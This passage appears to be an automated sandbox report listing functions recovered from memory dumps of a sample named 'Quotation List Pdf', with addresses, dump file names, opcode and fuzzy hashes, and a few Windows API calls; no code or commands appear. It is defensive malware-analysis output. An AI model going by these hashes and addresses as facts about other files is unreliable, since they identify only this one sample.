                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                                                      • Instruction ID: b8c6a8e0d7b5a52c899f5ce350278f7e8d4e1f45f04b92033af5766fea4bfbc7
                                                      • Opcode Fuzzy Hash: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                                                      • Instruction Fuzzy Hash: F5D101B3B1075983E718AF2AE405269BAA2FB55BD8F545235CE6E07BD8CF38D810C740
                                                      Function 00007FF768500D30 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoEx.KERNEL32(?,?,?,?,?,00000010,0000016FC74002C0,?,?,00000000,?,?,00007FF7684CE953), ref: 00007FF768500D86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 204640446f1087154f6338ca72d232791813a4a0625229ff24d57606c327cb8e
                                                      • Instruction ID: 572431d387d5ab35c673b9220a0992e7c4e929a332c68dd641d57d56c648bbeb
                                                      • Opcode Fuzzy Hash: 204640446f1087154f6338ca72d232791813a4a0625229ff24d57606c327cb8e
                                                      • Instruction Fuzzy Hash: 71011733F08614DAEB11DAB5EC014EDBAB4BB54358B90013AEE0D66A49EF34A452C640
                                                      Function 00007FF7684658C0 Relevance: 1.0, Instructions: 950COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25344163fb3e352c34538291974fad36bcb5627af75f838acfed12e2fba72d91
                                                      • Instruction ID: 17694e2364f2e9f7771ff93ee9e512ff9114e8f11f6d2307e388e681ab62ae91
                                                      • Opcode Fuzzy Hash: 25344163fb3e352c34538291974fad36bcb5627af75f838acfed12e2fba72d91
                                                      • Instruction Fuzzy Hash: E492D3A1A18B46C5EA11FF21E5506B4EB96BF48BC4FC84536D90E63366DF3CE085C368
                                                      Function 00007FF7684667E0 Relevance: .7, Instructions: 655COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 801744bdd96377547b888a3c70e772e67b1585d8fb76d1f3f959e3ca14fd2e86
                                                      • Instruction ID: 425d90a98f7355a596375c132fd38b15b268bd64ccd016abf622ca50f71c8085
                                                      • Opcode Fuzzy Hash: 801744bdd96377547b888a3c70e772e67b1585d8fb76d1f3f959e3ca14fd2e86
                                                      • Instruction Fuzzy Hash: 83529D72B09B45C6EB109F65E4401ADFBA1FF48B88B844536EE4E67B58CE3CE481C758
                                                      Function 00007FF7684671B0 Relevance: .6, Instructions: 574COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 781d2a1a5c9ba1d80fa3332f439c67dbd3f5da6a5da9899e467eda87960517b7
                                                      • Instruction ID: d5e42fcc4d0d1d9d2ff7624cb1357c0b8d99ec468ab76f6fb12c96d7691af77d
                                                      • Opcode Fuzzy Hash: 781d2a1a5c9ba1d80fa3332f439c67dbd3f5da6a5da9899e467eda87960517b7
                                                      • Instruction Fuzzy Hash: F732A472F19746C6EB10DF65D5402BCEBB2AF04798B804636CE0D27B88DE38E495C368
                                                      Function 00007FF768456C90 Relevance: .4, Instructions: 431COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12364d0ff0cea06089e9274694b767b8b30ef639dd9b265c612d6c852c853e6b
                                                      • Instruction ID: eeb89b8df4c3e737192ca5f54f1d32bbf374558f92e0f51d50dcb28fbf1badd7
                                                      • Opcode Fuzzy Hash: 12364d0ff0cea06089e9274694b767b8b30ef639dd9b265c612d6c852c853e6b
                                                      • Instruction Fuzzy Hash: 7B126CA2A1AB96C1EE659F19C04436CEBA1FF18BA4F949335CE2C073D4DF2CD490C259
                                                      Function 00007FF7684E7F40 Relevance: .4, Instructions: 430COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 313dea30c798e73606019446f4cb135ba51061c0bfdcea6891a82da26de4cdd6
                                                      • Instruction ID: a61d4ce1f6066e7454c423cd04eba3629645a9595af12b9ad5a9dc0f0077b084
                                                      • Opcode Fuzzy Hash: 313dea30c798e73606019446f4cb135ba51061c0bfdcea6891a82da26de4cdd6
                                                      • Instruction Fuzzy Hash: C6F17A63F68956C2FB285F189C09379EA52EF91304F98C236DA4E07BD8EE3DE4458314
                                                      Function 00007FF768451D60 Relevance: .4, Instructions: 412COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00ca48302f7e549fd0b9dcb0b29a96f96b9d26f61ae64e1577846578a65f7f54
                                                      • Instruction ID: 9dda99403a75096a27a575999cc79ac5be58a310139f0fc2c203a8d17600211a
                                                      • Opcode Fuzzy Hash: 00ca48302f7e549fd0b9dcb0b29a96f96b9d26f61ae64e1577846578a65f7f54
                                                      • Instruction Fuzzy Hash: 61029B72A08A96C6EA04AF25D44467CEBA1AF49BA4F844336DE3D477D1CF3CE441C369
                                                      Function 00007FF7684517B4 Relevance: .4, Instructions: 357COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuery
                                                      • String ID:
                                                      • API String ID: 2783962273-0
                                                      • Opcode ID: dbabca0daaad52e6d2fee9b053951e65599bec3c22e1c459a219101abfb20a77
                                                      • Instruction ID: 161cdd6901744c714efc22c4f0b13703cb7c75c7bd924fcf070c63cce57217ec
                                                      • Opcode Fuzzy Hash: dbabca0daaad52e6d2fee9b053951e65599bec3c22e1c459a219101abfb20a77
                                                      • Instruction Fuzzy Hash: 4502AF61E09B46C5FA52AF24D550378EBA1AF49B98F944336CD4E133A1DF3DE481C368
                                                      Function 00007FF76843B6F0 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                                                      • Instruction ID: c923a55fb0c26e218d6b153e9aa348bd34db4d64614ebe8695804ef7c155a272
                                                      • Opcode Fuzzy Hash: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                                                      • Instruction Fuzzy Hash: 2BD19CB3714B8883DB599F26E0447A8BBA9EB58BC8F544035DE0E0BB58DF38D644C764
                                                      Function 00007FF7684BDD30 Relevance: .3, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 99a4a12b91c2d5bd1856623fb6e16607a499bd9f8d9650a84f116bfe847d2354
                                                      • Instruction ID: 38cf4069543e1ad500e6f46e4c026ac3526c4c00c8fed592e6ae193750e869e7
                                                      • Opcode Fuzzy Hash: 99a4a12b91c2d5bd1856623fb6e16607a499bd9f8d9650a84f116bfe847d2354
                                                      • Instruction Fuzzy Hash: 15613C50E28546D6EE28BF63E8550F5D6302FAA7C0FC42432EA2E17793EE1CE555836C
                                                      Function 00007FF7684481F0 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f6dc304a19f2a48ee2c861db27342cb39ee3eea17acda9183df1afc939c6c05
                                                      • Instruction ID: 322bb364ee5d7b3a892535d34d2394edcc5dd6d1acd876f9a74e69c6d9ef207e
                                                      • Opcode Fuzzy Hash: 7f6dc304a19f2a48ee2c861db27342cb39ee3eea17acda9183df1afc939c6c05
                                                      • Instruction Fuzzy Hash: FFD17D32A5AB86C2E760EF14E840279E7A1FF48B58F854136CA4D57352DF3CE095C3A8
                                                      Function 00007FF76845BC80 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d6254c0ef687fac40c48f3d506a17342e23e87eff8218f83829c6cce0c6783e
                                                      • Instruction ID: 651a55730288affda95be0a0028c8d4015d4cb62e7c944c3930bacd0a893bde5
                                                      • Opcode Fuzzy Hash: 4d6254c0ef687fac40c48f3d506a17342e23e87eff8218f83829c6cce0c6783e
                                                      • Instruction Fuzzy Hash: 6AC19B32A08A46C1EA41AF15E854278FBA6FF05BA4F844736CE6D477A1DF3CE054C369
                                                      Function 00007FF768465490 Relevance: .2, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28436a9c3417000466a2d9979135604bb1afaa64b481e814e6aa6ec24cae149b
                                                      • Instruction ID: ea5b5b57155e40c94f2c780ac2efd2e8776000cf9c7e800cd64504f5ed257723
                                                      • Opcode Fuzzy Hash: 28436a9c3417000466a2d9979135604bb1afaa64b481e814e6aa6ec24cae149b
                                                      • Instruction Fuzzy Hash: 88C1C472A18B86C1EA00AF15E814178FBA6FF44BA4F854636C96D577D6CF3CE090C368
                                                      Function 00007FF7684382D0 Relevance: .2, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                      • Instruction ID: 978085aaf2df43bbaba28a04a74b4f327c2602a2347cd8dc67fb4235a9faadf4
                                                      • Opcode Fuzzy Hash: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                      • Instruction Fuzzy Hash: CA9100B3A10B5587DB18DF2AD841268BBA0FB54BE8F505239CE6D43B98DF38D911CB40
                                                      Function 00007FF76856D7E0 Relevance: .2, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0bef39161097e9df54091f6f8947ac5f1bb2ebaed7a10930231bbe4d97c59e0
                                                      • Instruction ID: c8c7164ffe0f120dec217bb1bc09d89e3ca78e6ca6cb16987b3d636b6c1c4ff6
                                                      • Opcode Fuzzy Hash: d0bef39161097e9df54091f6f8947ac5f1bb2ebaed7a10930231bbe4d97c59e0
                                                      • Instruction Fuzzy Hash: 9341C5A1E19882DAEA14BF63ED411F9DA506F94FC0FC44031ED0D97797ED2CEA0183A8
                                                      Function 00007FF768449A90 Relevance: .1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4cfc7e4d115ce1370a28ac6abb2cf91c2911c6ad5a29bc3d3fae3187189239e
                                                      • Instruction ID: b12169b1eea90c735a298abf3a0bee3949456d292ecc0226a3c3ae9f8622c809
                                                      • Opcode Fuzzy Hash: c4cfc7e4d115ce1370a28ac6abb2cf91c2911c6ad5a29bc3d3fae3187189239e
